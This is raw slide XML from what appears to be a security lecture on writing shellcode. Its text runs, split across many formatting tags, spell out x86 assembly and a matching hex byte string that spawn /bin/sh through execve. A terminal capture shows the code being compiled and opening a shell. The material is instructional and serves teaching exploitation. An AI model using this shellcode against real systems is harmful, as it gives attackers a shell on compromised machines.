          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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xor</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push </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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	# push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>n/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>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push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x68732F6E	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push //bi</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push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x69622F2F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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push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push </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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ecx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edx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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$11,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%al	</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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(char* filename, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80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xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%al</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xor</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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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203</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2974694" y="1258488"/>
            <a:ext cx="6269373" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>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ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>no_null_no_newline_shellcode.s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-41.$</a:t>
            </a:r>
          </a:p>
          <a:p>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21605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a:t>Testing the Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600202"/>
            <a:ext cx="8229600" cy="4777450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B00040"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>= "\x31\xc0\x50\x68\x6e\x2f\x73\x68"	                 </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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x68\x2f\x2f\x62\x69\x89\xe3\x50"	                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a: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"\x53\x86\xe5\x89\xc2\x0b\x01\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"	                 </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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x80\x31\xc0\xb0\x01\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</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	                 </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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x80";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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t>
            </a:r>
